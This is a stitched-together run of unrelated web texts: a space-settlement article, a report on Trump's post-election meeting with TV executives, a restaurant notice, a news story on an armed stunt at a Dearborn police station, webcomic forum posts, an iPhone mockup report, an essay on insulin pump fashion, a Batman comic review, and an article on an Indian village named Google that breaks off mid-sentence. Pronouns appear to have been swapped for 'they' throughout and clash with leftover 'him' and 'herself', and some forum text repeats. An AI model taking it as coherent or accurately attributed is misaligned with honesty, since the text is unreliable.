Rick Tumlinson is head of the asteroid mining company Deep Space Industries, which aims to be the gas station, building-supply centre and the air-and-water provider for space settlements. In the 1970s, a young Tumlinson worked at the Princeton Space Studies Institute, where they came under the influence of Gerard O'Neill and science fiction author Arthur C Clark (known to them as “Uncle Arthur”). They even led the New York chapter of the L5 Society. Deep Space is playing the long game out of a commitment they say they made in 1986 with several NewSpace entrepreneurs. According to Tumlinson, they pledged their lives and fortunes to “making the human breakout into space happen in our lifetimes”.
Tumlinson was one of a group that leased the Mir Space Station commercially from the Russian government for a few months in 1999. Calling it MirCorp, they gave their venture a countercultural, tongue-in-cheek personality, and sent up a Jolly Roger flag with the first commercial cosmonauts. Nasa and the State Department were not amused. They placed heavy pressure on the Russians to de-orbit Mir in order to focus on the ISS, then under construction. The current crop of space entrepreneurs, like Musk and Amazon's Jeff Bezos, watched Mir's firey re-entry and breakup in 2001. They have learned from this and dedicate a lot of effort toward diplomacy and government cooperation.
Speaking at the Humans to Mars conference in Washington last month, Nasa chief Charles Bolden laid out a vision for bringing the US space programme out of its first stage, exploration, and into pioneering, even homesteading. “We are, right now, an Earth-reliant species,” they said. “But only multi-planet species survive for a long period of time.” Nasa plans to start with an asteroid capture and redirect by 2025, then pick up skills in the proving ground near Earth before venturing to a destination a thousand times farther than the moon. When humans get to Mars in the 2030s (the much-mocked Mars One group aims for the rather optimistic goal of a proper human settlement by 2024, or 10 years from now), the implication is that we will be there to stay.
If large-scale space settlement still sounds a little crazy, consider that from the passing of the Space Settlement Act 1988 until its quiet demise in the Paperwork Reduction Act of 1995, establishing extraterrestrial civilisation was the official goal of the US in space. The Space Settlement and Development Act of 2015, currently under draft, would promote economic development in space and work to reverse current strictures against property ownership in space.
Which brings us to what might be the biggest obstacle close to being hurdled: who would move to a city on Mars? Well, lots of people claim to be interested, signing up to Mars One's non-binding longlist of candidates to emigrate to the Red Planet. But López-Alegría, the former ISS resident, says that while they could imagine our space presence being scalable, they wouldn't volunteer to live permanently in a space city. “The experience of being in space is magnificent," they say, "but only in the context of being an Earthling and knowing that you're coming back to Earth."
• A cosy little house on Mars? Cities in space – in pictures
President-elect Donald Trump held what senior adviser Kellyanne Conway called a "reset" meeting for members of the media at Trump Tower on Monday. (Victoria Walker/The Washington Post)
Powerful figures from the world of television news met privately with President-elect Donald Trump Monday amid rising concerns about Trump's failure to accept the norms of presidential media coverage, such as a traveling press pool.
Trump hosted more than a dozen TV executives and hosts at Trump Tower midday for what senior adviser Kellyanne Conway called a “reset” meeting following the election. Conway did not tell reporters in the lobby what was discussed, describing the meeting as “off-the-record.”
Attendees from the five major networks, who started trickling in around 12:30 p.m., included CNN President Jeff Zucker, NBC News President Deborah Turness, MSNBC President Phil Griffin, Fox News presidents Jack Abernethy and Bill Shine, and Fox News executive vice presidents Jay Wallace and Suzanne Scott, according to a pool report. Wolf Blitzer and Erin Burnett of CNN; Lester Holt and Chuck Todd of NBC; George Stephanopoulos, David Muir and Martha Raddatz of ABC; and John Dickerson, Gayle King, Norah O'Donnell and Charlie Rose of CBS were among the anchors and hosts spotted entering the building.
Here's how it went, according to our colleague Karen Tumulty:
On Monday afternoon, they had a contentious Trump Tower meeting with another one of their chief adversaries: members of the news media.
In the session with more than a dozen television executives and on-air journalists, Trump was highly critical of coverage of him, according to several people familiar with the gathering. Keeping their voice calm and their tone flippant, they told the group sitting around a conference table that they failed to provide their viewers with fair and accurate coverage and told them they failed to understand them or their appeal to millions of Americans.
Trump expressed particular ire at CNN and at several reporters at other cable networks whom they see as unreasonably antagonistic toward him, though they did not mention them by name.
The people variously described Trump as “combative,” “proud,” and “dismissive” toward the news organizations present. They also shrugged off the need for a constant pool covering him, they said, although they did not delve into specifics.
Here's more detail from our colleague Paul Farhi:
Instead of striking a harmonious tone to build a rapport after the election, Trump was combative, participants said. In a calm and deliberate voice, they told the group sitting around a conference table that they had failed to provide their viewers with fair and accurate coverage, and they told them that they failed to understand them or their appeal to millions of Americans.
Trump showed no love for the media during the long campaign, calling reporters the “lowest form of humanity.” And on Monday they repeatedly used the words “unfair” and “dishonest” to describe the coverage, participants said.
But they made no mention of the enormous amount of airtime that the networks, especially on cable, devoted to their campaign. A number of analyses have noted that Trump's presidential effort was boosted by the news media's fascination with him.
Trump directed particular ire at CNN and several reporters at ­other cable networks whom they see as unreasonably antagonistic toward him, though they did not mention them by name. They also referenced both NBC News reporter Katy Tur and ABC's Raddatz without using their names.
The meeting was the first of at least two scheduled between the incoming president and the media this week. Conway said representatives from the New York Times will meet with Trump on Tuesday. According to a report from the Huffington Post, Trump will meet with New York Times publisher Arthur Sulzberger and speak on-the-record with Times journalists and columnists.
Early Tuesday morning, Trump tweeted they cancelled the meeting with the Times. Later, aides confirmed the meeting was reinstated.
Unlike their predecessors, Trump has not held a news conference since winning the election on Nov. 8. “The man works 18 hours a day interviewing people, taking calls from all around the world. They will have a press conference in due course,” Conway said.
Japanese gastropub Kaze will be expanding its hours to include lunch beginning on Black Friday (Nov. 29). The restaurant will now open at 11 a.m. and stay open through their regular dinner hours ('til 1 a.m. Sunday-Thursday; 'til 2 a.m. Friday and Saturday).
The new lunch menu will include some dinner favorites plus a bento box or a sashimi lunch plate with Chef Hideki's freshest seafood and rice. All items range between $8-$23, with cheaper starters and cups of soup. And the restaurant will also be offering the option of lunch reservations plus outdoor winter seating in their heated garden patio.
For those of you who don't need a cocktail at lunch, Kaze will also be offering a selection of "mocktails," mixtures of their regular cocktails sans booze, along with their regular full-service bar.
Kaze is located at 1400 Vine St., Over-the-Rhine. More info at kazeotr.com.
Menu:
(CNN) An on-camera stunt apparently designed to make a point about civil liberties ended in the arrest of two men Sunday.
Police in Dearborn, MI, said they charged the men with breach of peace after they walked into a police station wearing tactical vests, one of them carrying an AP-14 firearm and a handgun.
Police confronted the men, later identified by authorities as James Craig Baker and Brandon Brent Vreeland. They initially refused to comply with the officers' commands, authorities said.
In the encounter, which the men streamed live, police were heard giving commands to put the guns down and step back. One man was heard telling police they weren't breaking any laws.
As an open carry state, Michigan allows licensed gun owners to carry a firearm in public so long as it is not concealed.
Officials said Baker, 24, of Leonard, MI, was armed with the two firearms. They have been charged with breach of peace, masks/disguises while parading, and failure to cooperate during booking proceedings.
Authorities said Vreeland, of Jackson, MI, was carrying the camera and a tripod. They have been charged with breach of peace, failure to obey police officer's direction or order, and resisting an officer's demands. All of the charges are misdemeanors.
Both men were released on $1,500 bond pending a Feb. 24 court date, according to police and court records.
Baker declined comment to CNN on Tuesday before consulting with their attorney.
By the time it was all over, police, who appeared to show restraint, seized guns, ammunition, body armor and ballistic vests, authorities said. In all they recovered four guns, including the loaded AP-14 firearm and a loaded Glock 19 handgun, authorities said. It wasn't immediately clear where the other two weapons were recovered from.
'You walked into a police department loaded'
Dearborn police said they first encountered the pair early Sunday afternoon when officers went to a shopping district to investigate a report of two suspicious men in a vehicle wearing tactical masks. The men left the area before police arrived.
A short time later, a Dearborn sergeant on patrol spotted the two men in their vehicle at a nearby park. The sergeant conducted a traffic stop and found that the men were dressed in tactical vests. The passenger, who was wearing a mask that covered their face, refused to speak to police, authorities said.
The sergeant let the two go after a brief preliminary investigation. But the pair wasn't done with police.
Police said the two then drove to the station; that's when the video shows the men walking into the station.
"So, we're here outside Dearborn police station," one of the men, who is masked, says to the camera. "We're going to go in and file a complaint because we were illegally pulled over about an hour ago."
"That's 100% accurate," the other man, who is not wearing a mask, responds.
"We felt a little afraid for our lives when we were pulled over, so we figured we'd better protect ourselves," says the man in the mask, who has a gun around their neck.
As the men entered the station, police immediately issued commands.
"Dude, put that on the ground," a voice can be heard saying.
The video appears to show officers pointing their guns at the men.
The camera seems to drop to the ground. The video cuts out while the audio continues.
"Put it on the ground or you are dead," a voice can be heard yelling.
"I will put a round in you, sir," a voice yelled.
One of the men is heard saying they will remove the rifle from around their neck.
"Put it down, barrel down, set it down, step back. You're carrying a sidearm as well," one voice yells.
"It's all legal, sir," one man says.
At another point, a voice can be heard saying; "You walked into a police department loaded, okay. How stupid is that?"
Gun rights group denounces stunt
Dearborn police and a local open carry rights gun group have criticized the men for their actions.
"I find this behavior totally unacceptable and irresponsible. This is not a Second Amendment issue for me," Dearborn Police Chief Ronald Haddad said in a press release. "We had members of the public in our lobby that fled in fear for their safety as these men entered our building."
Michigan Open Carry Inc., said it "in no way supports the actions of these individuals."
The group said it advocates for and educates individuals about their legal right to openly carry a holstered handgun for protection.
"There is a clear difference between the everyday protection we advocate for and the attention seeking actions of these individuals. Wearing a mask, dark glasses, visible body armor, and a rifle slung across your chest instills a very specific image that cannot be ignored."
"Like it or not, exercising your rights is not black and white. How you act and portray yourself is a big part of advocacy. I believe these gentlemen failed in this regard," Michigan Open Carry president Tom Lambert said in a statement.
Free Radical wrote:
Interesting - Marie thinks they need to be quick to get Wanda, but gets stuck in prison. Meanwhile, Phil Predicts that Buck will stop Wanda going through the portal, despite that not seeming something obviously Predicted to Marie.
I think all that suggests that Phil is lying about their Prediction to Buck, but that Marie is mistaken about Wanda being Predicted to arrive in Faq this turn. Marie is possibly confused because they had long ago Predicted that Wanda would serve in Faq again, which they assume ties in with the other Predictions she's using at the moment!
The reason for Phil's lie would be that if Buck confronts Wanda by the portal to Faq and tells them that they are Predicted to stop them from going through the portal, Wanda will immediately decide not to go through. That will fulfill the supposed Prediction in Wanda's mind, and leave them free to simply croak him.
Phil gets what they want, the actual prophecy to be fulfilled in the way they desire, despite not actually having a Prediction on it...
Sir Dr D wrote:
And I found it interesting that Jillian referred to Banhammer as 'Daddy', which is a term of endearment. Would the inner peace Jillian have ever called them 'Daddy' instead of more formal terms? Has something happened between events that caused the two to be closer together?
Like perhaps Banhammer was positively influenced by Saline IV or something
WarFAN wrote:
Evil_Lamp_6 wrote:
Marie answered Jillian honestly in Panel 4. If they themselves was responsible, that could be why the ellipsis is present. Additionally, it could be quite why Marie is hesitant to provide the truth as Jillian (probably rightfully) would croak them then and there if that were the case for all the trouble they (Marie) has caused them (Jillian). Hence the request for a Pinkie Swear in Panel 7. And the title is also a nice callback to the very opening to Just a thought: We (or at least I, and apparently Jillian) believed that some combination of Stanley/Wanda were responsible for the fall of FAQ 1.0 (King Banhammer's FAQ). But...What if Marie was really the one who orchestrated it? It was at the very least hinted in Book 0 that Predictamancer Delphie may have had their hand in the downfall of Goodminton. I am now suspecting that Marie might have had a similar role in FAQ's downfall.Marie answered Jillian honestly in Panel 4. If they themselves was responsible, that could be why the ellipsis is present. Additionally, it could be quite why Marie is hesitant to provide the truth as Jillian (probably rightfully) would croak them then and there if that were the case for all the trouble they (Marie) has caused them (Jillian). Hence the request for a Pinkie Swear in Panel 7. And the title is also a nice callback to the very opening to Book 0 itself.
Jillian and you are right about the Wanda/Stanley combination and the end of FAQ 1.0. It has been confirmed by both Stanley and Wanda.
And Wanda's attunement to an Arkentool was Predicted by Marie. Wanda contacted Stanley and told them about FAQ 1.0 to ambush them and take their Arkenhammer. Stanley encountered a ton of dwagons in their way to FAQ and the ambush failed. When Stanley's victory was clear, Wanda turned to Gobwin Knob and killed Banhammer herself. Jillian and you are right about the Wanda/Stanley combination and the end of FAQ 1.0. It has been confirmed by both Stanley and Wanda.And Wanda's attunement to an Arkentool was Predicted by Marie. Wanda contacted Stanley and told them about FAQ 1.0 to ambush them and take their Arkenhammer. Stanley encountered a ton of dwagons in their way to FAQ and the ambush failed. When Stanley's victory was clear, Wanda turned to Gobwin Knob and killed Banhammer herself.
Yawner wrote:
I think predictamancers causing things to happen by predicting is sort of like saying, that windmills cause the wind to blow. You always see windmills turning when the wind is blowing and when they don't - the wind is still. And if you stand close to a windmill that has been artificially forced to turn, you can actually feel the wind on your face. So, windmills => wind, predictions => fate?
Obviously not, but, just like a windmill can cause a slight breeze, a predictamancer can cause a slight shift towards the fated occurance just by the sole act of predicting. We have no evidence, that predictamancers can willfully cause anything to happen by predicting it, only that they can willfully push the events towards the predicted fate (Marie being the extreme (and, in my opinion, a very, very misguided) example of that).
The fate of Delphine Temple actually contradicts that Predictamancers cause events to happen by willfully predicting them (or that they can have them "un-happen", by knowing the fate through prediction). Them fate shows, that Predictamancers may not really have any agency in whatever they predict. They didn't want the fate they predicted to come into fruition, because that meant the end of them and their side. Why would they willfully predict something that opposite to them will, if the sole act of predicting was what caused that to happen? And why didn't they do anything to prevent it, if its fate wasn't inevitable?
Btw., how many times predicted fate has been avoided by anyone? Like, permanently avoided, not just delayed like Sylvia and (apparently) Charlie?
Given all the murders and backstabbing Marie's indulged in, I honestly can't think of a more suitable response.I don't think the rodent's pet prophet is lying ( they said flat out there are no competing predictions ). Rather, it seems highly likely that the prediction Marie is claiming will lead to Wanda turning to Faq can be fulfilled without them going anywhere near ICFYS.Buck then, could remove the possibility of Wanda heading into the portal in question by repeatedly bruising their fists with their face, running for their life as they stalked them through the tunnels, reminding them about the prisoners they murdered causing them to ask some pointed questions about Faq's prisoners, boasting about how he's predicted to stop them going through a certain portal thus causing them to doubt any claims to the contrary or just by driving them into some other portal to avoid their attacks.I recall them using the term in Book zero. Not out loud mind. But they did think it . Wait, I tell a lie, they called them 'daddy' in private at least once Well for a start, I don't recall either Wanda or Stanley saying a word about how Banhammer actually died, they could have choked on a bone for all we know. But never mind that, even if we take everything they have said at face value, there's plenty of room for Marie's controlling hand to have struck, sabotaging Faq's defences, using scrolls to compel Wanda, the sky's the limit. She's obviously capable.And you know, it may have been Faq who knocked over Goodminton, Marie is believed to have made their "Faq's doom" prediction when they first laid eyes on Wanda, twelve turns before Goodminton fell, that's enough time to launch a strike given the distances spoken of when Gillian found the place. And there was a mystery relating to the spent state of the city's air defences left unexplained . In that scenario, Marie's prediction was self fulfilling due to Wanda's vengeance oath.I mostly agree, there is indeed no evidence to support the thinkamancers' claims... but... even with Fate existing independently of any sorcery, it's not impossible they're right about how predictamancy itself works. It is a theory designed to glorify thinkamancy however, so a salt mine or two should be taken.Yes, among the many problems with predictamancers like Marie, is that much like the Jedi, they confuse knowledge with wisdom. The person who made the predictions isn't necessarily the best person to decide what to do about them.The trouble with Delphie is that they tried to do what Marie's doing, forcing fate to happen on their own terms (although to a less of an extreme than Marie, who has committed multiple murders (I suspect Delphie, for all their faults, genuinely was trying to minimize the pain and suffering for all concerned) and appears to be trying to fulfil predictions on a technicality). But Goodminton and they themselves had no specific fates, so they were mostly guessing and hoping, which is a large part of why everything they touched blew up. I do wonder what it was their peers (Marie may well have been among them) had to say on the matter. Never to my knowledge.
Another day, another dummy. We've recently obtained new images showing what appears to be a gold iPhone 6 mockup pictured next to the other two color variations that Apple currently offers. As mentioned, this is definitely a dummy model, but it's also the first time we've seen a gold one.
The camera cutout on the lighter colored models looks a little but strange, but again these are dummy units and we don't expect them to perfectly reflect the actual design. Along with that, the Space Gray and Silver models seem to have a gold Touch ID ring which is also a bit out of place. Either way, they are definitely fun to look at. Rumors suggest that Apple's iPhone 6 will feature a 4.7-inch display and possibly a 5.5-inch variation, borrow design characteristics from the fifth generation iPod touch, and feature resigned buttons. At this point, we've seen just about every rumored render, mockup, and schematic relating to Apple's upcoming iPhone 6.
These images are consistent with previous rumors, but we won't know what Apple's official design will look like until later this year. It's likely that these models were created based on rumored schematics and specifications, but the design does match up with previous photos.
My first reaction to Jessica Floeh's line of insulin pump accessories — cleverly named Hanky Pancreas — was clear and uncomplicated: those are so pretty and I want them.
I imagined myself wearing outfits organized around cascades of shells, feathers, and beads, articulating a personal style concept like urban mermaid, embodying Beach House's Devotion, or glamorizing my weekend jeans-plus-t-shirt ensemble with elements of burlesque costuming. Knowing that these objects would be anchored by my insulin pump gave the enterprise a sort of steampunk appeal, and this excited me, too (I didn't immediately recognize the suitability of these designs to shabby-chic, nostalgic Victorian, or popular bridal aesthetics, but looking again, I see they're there, too). But there's more at stake in Floeh's designs than the cultivation of a particular cyborganic aesthetic.
The purpose of Hanky Pancreas accessories seems straightforward: dress up your pump. Or, more to the point: camouflage your robotic pancreas with embellishments — like fake flowers, seashells, feathers and beads — that invoke the feminine, the natural, and the ephemeral. The idea of embellishing one's pump is a game-changer; doing so in a way that enables an expression of femininity is even more remarkable. Most pump cases, pouches and holsters for adult pump-wearers are designed for function, and little else. With their liberal use of nylon, velcro, and elastic, and their neutral and dark palette, most pump accessories appear to have come from the physical therapist's clinic, or the paranoid tourist's luggage. They secure the pump without drawing attention to its existence (and, by extension, to the fact of the wearer's diabetes). Floeh's designs pursue a different agenda. In addition to keeping the pump in place, they suggest the holders have affective and transformative potential:
The current collection is for women and represents a series of design solutions that better integrate the machine with the body and mind. By turning medical device into fashion accessory the designs alleviate anxiety, create dynamic communities, and encourage new relationships with medical technology. […] The designs intend to inspire internal change through external change in order to improve overall health.
There's a lot to unpack here. It may seem that Floeh promises more than an accessory can deliver, but their claims don't seem so far-fetched when we think about the pump as a nexus for a tangle of (wearer) concerns around gender, sexuality, dis/ability, and personhood. When I went on the pump, my pressing questions weren't about the pump's mechanics, or how I'd insert my infusion sets, but about how I'd sleep and have sex, how the pump would work (or not) with dresses and burlesque costumes, and what this would add to my mental list of daily diabetes-management responsibilities (i.e., always carry fresh AAA batteries, make sure the reservoir has enough insulin before leaving for work, have spare infusion sets at the office). I relied on advice and support from a queer femme diabetic friend, who helped me articulate connections that made the transition easier: queering diabetes gave me a critical framework for being diabetic in relation to normalizing social and medical structures. And it helped me extend the feelings, thoughts, and politics I'd developed around my queerness to my diabetes: resisting shame and pathologization; making connections across embodied differences/identifications/situations (and committing to an ethic of care as part of this practice); celebrating norm-challenging bodies; and fostering a sex-positive culture in opposition to the dominant cultural tendency to infantalize or de-sexualize people with disabilities and chronic illnesses.
Advertisement
I was also lucky to have studied the history of the U.S. AIDS activist movement, to have read Donna Haraway's A Cyborg Manifesto: Science, Technology and Socialist-Feminism in the Late Twentieth Century and Eli Clare's Exile and Pride. I wish I'd read Michelle O'Brien's Tracing This Body, because it's helpful to think with as we occupy positions in which we're both resisting and depending upon oppressive systems (e.g., pharmaceutical development, manufacture, and trade; transnational capitalism) and can't live in accord with a radical politics of purity. All this is to say that when the time came for me to start wearing the pump, I was lucky to have an amazing conceptual-political-emotional toolkit at the ready. This is not the case for the majority of pump-wearers.
A couple of months ago, a friend sent me a link to a BoingBoing post directing readers to an essay by Jane Kokernak. Kokernak writes about how living with the pump has negatively affected their sense of sexual self. For Kokernak, wearing the pump is an inherently un-desirable way of being. They open with the claim that:
A $6,000 insulin pump with an on-board computer chip is not alluring. Neither is the white mesh adhesive patch on my naked abdomen or the length of nylon tubing that connects the patch to the pump. There is only illness, and there is no way to make that sexy. After several years as a medical device wearer, I know.
Advertisement
Clearly, the privilege of having access to (i.e., affording the health insurance to cover) the pump is diminished by Kokernak's experience of de-sexualization. The pump also threatened their sense of gendered self, and meant trading one kind of security and wellness for another:
Although the pump offered me better health and the hope of fewer long-term complications from diabetes, wearing it made me feel fragile and also inexplicably obsessed with doubts about myself as a woman.
The pump effectively introduces vulnerability, disruption, insecurity, and loss of sexual self in their experience. Because I know only one type 1, pump-wearing, conventionally-female-gendered, straight diabetic, I don't know how common Kokernak's experience is, or which aspects may be shared (or not) among other diabetic women. A blog post Floeh wrote about the rationale for Hanky Pancreas suggests that Kokernak is not alone — and that the pump threatens many women's ability to maintain their preferred gender presentation. They write:
My family friend told me that they would even switch back to injections when they wanted to wear a tight dress. Some women don't place it in their cleavage because of their chest size. And one woman actually got breast enhancement surgery to hide their pump better.
Advertisement
For these women, the pump is a material obstacle to (feminine) gender expression that demands a material solution – it's not just an issue of affect or subjectivity. In these instances, maintaining a preferred gender means making choices with serious physical consequences. It's clear that in this world, wearing the pump doesn't mean re-making gender in ways that seem liberating or transformative. Instead, wearing the pump creates another barrier to embodying an already-impossible ideal (normative) gender.
The practical implications of pump-wearing also play out in the sexual realm. Kokernak draws attention to the ways in which the pump interrupts (and thwarts) their ability to be sexual. While our experiences of transitioning to the pump may have been quite different, their description of the logistical difficulties one encounters while dressing (or undressing) for sex rings true:
Negligees and nudity are impractical, because neither provides much to clip the device to. Clothes and pajamas, on the other hand, have waistbands or pockets, which keep the pump steady during the prelude of kissing and touching. The pump can even be negotiated during the impatient slithering of fingers into nightclothes. If my husband and I lie on our sides, front-to-front, I can clip my pump against my hip. If I'm on my back and Jimmy wants to lay their full length on top of me, I adjust the pump along my waistband toward my back, so the hard case doesn't press into theirs abdomen.
Advertisement
These are familiar negotiations. However, I experience them differently because of the way I have sex, and because of my history having queer sex (and safer sex and sex with toys). When a partner and I are having sex, we pause to accommodate (and often laugh about and fumble with) batteries and condoms and buckles and straps — taking a moment to un-tether myself doesn't feel disruptive in this context. I was surprised, the last time I had sex with a new person, that I didn't formally introduce them to the infusion site in the way I had with previous partners, because I felt confident that their first encounter with the small piece of plastic and some medical tape at my infusion site wouldn't ruin the moment. But that's a hard-earned confidence, and one that derives from my queer crip affinities and experience.
"Flower Fairy," by Hanky Pancreas.
If we understand pump-wearing as a practice in which key aspects of subjectivity and personhood are articulated (and in which sex is had or not, and dresses are chosen or discarded!), the prospect of having a new resource — in the form of Floeh's creations — matters in some significant ways. And if Floeh's designs render the pump less of a threat, a disruption, or fashion-obstacle, this seems like an improvement. Floeh's designs permit wearers to make a strategic double-move around camouflage and visibility, simultaneously hiding the pump and drawing attention to its location (i.e., waist, hip, bustline). When I'm in disability-pride mode, I'm troubled by this kind of hiding, following the logic that visibility is good (i.e., wearing the pump on the outside makes us legible, shows the limits of clothes designed for bodies without peripherals, disrupts conventional, hetero feminine gender presentation) and hiding is, well, hiding, with its affective companions: shame, fear, desire for normalcy, willingness to pass.
Advertisement
But visibility is only one tactic among others, and hiding the pump can also be a radical act — especially if it facilitates feeling-good-while-diabetic (for example: the best act in my burlesque repertoire hinges on repurposing a strap-on harness as an under-dress pump-holder; most of the time, my solution to the dress-problem is a jury-rigged system involving a black garter with small cosmetics pouch from Benefit, bra straps, and safety pins to keep things from sliding down my leg — unless I'm already wearing a garter belt). Of course, in the case of hiding or disguising one's pump, feeling good can also mean feeling closer to a conventional femininity and mythic norm. I don't want to elide that possibility, but I also return to the reality of living with chronic illness: that we live in a space of contradiction, that we work with what we have & do what we need to do to claim our (sick, cyborg, incurable) bodies as desirable. In my ideal world — one I suspect Floeh wants, too — we'll recognize that transformation can (and should) mean more than transforming the pump, or the wearer's relation to it, to align more closely with a dominant, normate feminine ideal. Creating, enabling, accommodating, and celebrating a multitude of diabetic, cyborg embodiments — and advocating for wider access to the pump (with all of its troubling potential) for those who are uninsured and can't afford the $6000 price tag — these are the kinds of social transformations that need to happen in conjunction with personal ones.
I'm curious to see what happens when Floeh's products actually hit the market — who wears them, what kinds of feedback they receive, and how people incorporate them in their daily lives and outfits. Because the designs are not yet for sale, I'm bracketing my discussion of the politics of purchasing these products. I'll be interested to see how accessible their products are in terms of price, and how other factors — like buying from a diabetic, or buying handmade, or extent of desire — will figure into my decision about making a purchase. Floeh's personal story and motivating belief in the designs' transformative potential signal that she's in this for more than the money; they further support their empowerment ethos with a free tutorial showing how to re-create one of their designs. By providing open access to these instructions, Floeh encourages the crafty among us to come up with personal interpretations of their concept (I sure hope they make room for a gallery of Hanky-Pancreas-inspired projects on the site).
Regardless of whether Floeh's designs deliver on the promise of transformation, she's doing the important work of drawing attention to the struggles many women encounter with the pump, and to the ways diabetics negotiate social norms around gender and sexuality (i.e., it's not just a medical issue, an access-to-healthcare issue). And if a woman like Floeh (read: beautiful, stylish, nature-loving) can claim cyborg status, we can hope that women who might be otherwise averse will want to follow their example, and our robotic pancreases will become an extension of our bodies in action, in love, in fashion, feeling good.
Advertisement
If you live in the NYC area, and want to see the insulin-pump-burlesque number in person, you can do so this Saturday (June 5), when The Femme Show visits Collect Pond in Brooklyn. If you come, please say hello! I <3 cyborg solidarity!
Alana Kumbier is a Threadbared guest contributor, and long-time interwebz interlocutor. Kumbier is a femmebot, type 1 diabetic, (radical) reference librarian, and super-commuter.  They are co-editor of Critical Library Instruction: Theories and Methods, and contributes to Arcades Collaborative, a critical information studies blog. In their free time, Alana performs with The Femme Show and TraniWreck, is a member of the Boston Radical Reference Collective, and co-produces a monthly podcast, Champs Not Chumps.
This post originally appeared on the blog Threadbared. Republished with permission.
Advertisement
The author of this post can be contacted at threadbared.75@gmail.com
Want to see your post here? Email us.
Today, Drew and Mark are discussing Batman: Rebirth 1, originally released June 1st, 2016.
Sometimes a cigar is just a cigar. Sigmund Freud
Drew: There are plenty of reasons to believe Freud never said such a thing, but whatever its origin, this quote always helps me keep perspective when attempting to parse the symbolism in a work of art. The last thing I want is to sound like Fred Armesin's exaggerated (and nonsensical) lyrical analyses, so it always makes me nervous when I find my attention drawn to symbols within a comic. Even with that reticence, though, I couldn't ignore the deeply symbolic nature of Scott Snyder and Tom King's Batman: Rebirth, even if I'm not quite sure what all of the symbols mean.
The most prescient symbol — one that opens and closes the issue — is that of an avocado, picked by Alfred from trees outside Wayne Manor. If that repetition wasn't enough, the fact that the fruit is specifically an avocado makes it clear that this detail isn't incidental; avocado trees don't grow anywhere in the northeast, where Gotham is typically set. So what is it about avocados that demanded their inclusion here? Curiously, they're left utterly unremarked upon within the issue itself.
But, like, what do avocados symbolize? With less biblical baggage than an apple, and less phallic connotations than a banana, I don't have a go-to reading for avocados. (Incidentally, “avocado” is derived from a Nahuatl that also meant “testicle,” though I think it would be a stretch to consider that reading as meaningful.)
Perhaps we can get something from Alfred's gesture of casting the avocado into the cave? While some fruit bats do eat avocados, none of those species are native to North America. Which is to say, Alfred isn't feeding the bats. There are, however, numerous new world bat species that fertilize avocado trees, though again, none of these species live in the Northeastern US. So the gesture itself must be symbolic. If we pull our perspective out of the issue to understand its context — a story co-written by two writers who will proceed onto their own separate series following these same characters — splitting the avocado in half and tossing it into the Batcave makes a little more sense. That is, the halves of the avocado are Batman and All-Star Batman, both stemming from the single fruit of this issue, and both occupying the same space, though they are now separate entities.
It's not the clearest reading I've ever come up with, but I think it supports the themes of rebirth that permeate this issue. Whether that's simply meant to reflect the “Rebirth” in the title, or is a more meaningful reset for the character going forward remains to be seen, though it's difficult to ignore the significance of the torch-passing that this issue represents: longtime Batman writer Scott Snyder shares the stage with new Batman writer Tom King before leaving King to their own devices.
Anyway: rebirth. This issue opens and closes in spring, and cycles through a symbolic year before Batman is able to stop Calendar Man's season-accelerating machine. The details of Calendar Man's plans don't matter — something about bad spores and that machine that somehow changes the seasons — this is all about that symbolism. I mean, Calendar Man literally sheds their skin and is born anew.
Gross.
With that sense of rebirth in mind, perhaps Alfred isn't discarding that avocado, but planting a seed. The bottom of a cave might be an unlikely place for a tree to take root, but it's not really any weirder than an avocado tree in Gotham.
Speaking of trees, I was struck at artist Mikel Janin's clear allusion to another famous Batman rebirth: Year One.
That not so coincidentally leads us to Bruce flat-out stating thesis of this issue, if not necessarily King or Snyder's work with Batman going forward: “We come back better each time, too.” This isn't the first time Batman has been reborn, and it won't be the last, but hopefully each new iteration brings with it new ideas and innovation. With these two writers at the helm of Batman for the foreseeable future, it's not hard to imagine this rebirth actually living up to those promises.
At least, not for me. Mark, I'm curious if you're as excited for Batman and All-Star Batman as I am. Also, do you have a better reading of any of the symbols in this issue, or is this a case of an avocado just being an avocado?
Mark: I don't have anything to add in the avocado department, I think you pretty well summed it up. But I am excited for Batman and All-Star Batman, even as I'm a bit tentative about Batman moving to double printing. Still, if there is a writer I trust to lead us into the brave new world of DC getting an extra $2.99 from faithful readers each month, it's Tom King.
Batman is perhaps the DC character who needed a Rebirth makeover the least. Where the creative teams over Superman, Wonder Woman, Green Lantern, and insert-name-of-pretty-much-any-DC-hero-here seemed to lose their way over time, Batman's trajectory was being consistently charted by Scott Snyder and stayed faithfully on course.
The one Snyder-led Batman initiative I could never really care about was the introduction of Duke Thomas. It's clear in hindsight that Snyder had long term plans for Duke when they were first introduced, and he's slowly become more and more intertwined into Batman's world, but I still groaned audibly when Duke showed up at the front door of Wayne Manor. Duke Thomas so far has been boring and superfluous. It doesn't help that their main series, We Are Robin, was a pretty dire affair all around. Who is Duke Thomas and why should I care?
Batman: Rebirth doesn't spell out a compelling reason for Duke Thomas' inclusion, but I am interested to see if King is able to bring more interesting dimensions to Duke's character in their new role as not-Robin.
There's nothing earth-shatteringly new in Batman: Rebirth, but Batman wasn't really in need of massive reinvention, anyway. Instead, it's a reassuring continuation of Batman's steady run as it moves into a new configuration.
For a complete list of what we're reading, head on over to our Pull List page. Whenever possible, buy your comics from your local mom and pop comic bookstore. If you want to rock digital copies, head on over to Comixology and download issues there. There's no need to pirate, right?
RAICHUR: You can't google in Google. For, Google, a tiny village about 510km north-east of Bangalore, doesn't have internet connectivity.This village on the banks of the Krishna river in Raichur district, with just about 1,000 residents, is far removed from the search engine company based in Mountain View, California. And how you spell the name in English is left to you as all signboards here, including those of government offices, are in Kannada. When the government tried to put up English boards, activists stopped them. ‘‘We asked officials if anyone from Cambridge University would come here to read these boards,'' laughs Kannada activist K P Yallayyanayaka.No wonder then that only a few villagers have heard of their famous namesake in cyberspace. ‘‘My grand-daughter told me that two boys have named a website after our village. I feel happy and proud,'' says landlord Basavarajappa Gouda Police Patil. ‘‘Who'll not be happy to know the name of our village is so popular in the cyber world? But this is just a pleasant coincidence. Americans will have totally different reasons for naming their company Google,'' reasons native Sharana Gouda, an agricutural scientist who works in Bellary.The story goes that 12th century saint poet Allama Prabhu stopped by in the village while travelling from Basava Kalyan to Shreeshailam in Andhra Pradesh. The cave they stayed in has been described as ‘Gavi Gallu' (cave of stone), say villagers. ‘‘Our village was hence called Gavi Gallu. Over the years, it became Googallu and now it's Google,'' says Gouda.As proof, residents point to the temple atop the underground cave now. Devotees crawl through a hole in the ground to enter the cave, which has an idol of Allama Prabhu and a small well. Experts, however, point to a piece of history that they say is closer to the truth.‘‘The Helavas, who went around telling people about their ancestral history, say the village was named after rocks that seemed to 